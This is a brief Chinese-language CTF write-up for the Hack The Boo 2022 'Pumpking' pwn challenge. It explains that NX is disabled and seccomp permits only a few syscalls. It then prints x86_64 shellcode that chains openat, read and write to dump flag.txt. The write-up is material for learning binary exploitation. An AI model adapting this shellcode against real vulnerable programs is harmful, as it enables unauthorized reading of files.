Hack The Boo 2022 /Pumpking

# Hack The Boo 2022 /Pumpking ###### tags: `CTF`,`PWN`,`writeup` 檔案連結:http://gofile.me/6lhQ2/bU7bepEKk ![](https://i.imgur.com/ueA5sLD.png) NX沒開，可以直接在stack上跳舞，但是呢... ![](https://i.imgur.com/ToSjbWK.png) ![](https://i.imgur.com/wj2uVGx.png) 有開seccomp，會限制特定system call，建議初學者可以先理解函式呼叫，再執行工具seccomp-tools ![](https://i.imgur.com/2l3MmnS.png) 可以使用read、write、rt_sigreturn、exit、openat 很明顯就是串 openat -> read -> write 查一下 linux system call table for x86_64 直接送shellcode ``` push 0x7478 # "./" mov rax, 0x742e67616c662f2e # "flag.txt" push rax mov rdi,0xFFFFFFFFFFFFFF9C # dfd mov rsi,rsp # filename xor rdx,rdx # flags xor r10,r10 # mode push 257 pop rax syscall # call openat() mov rdi,rax # fd mov rsi,rsp # buff mov edx,0x100 # size xor eax,eax syscall # call read() mov edi,1 # fd mov rsi,rsp # buff push 1 pop rax syscall #call write() ```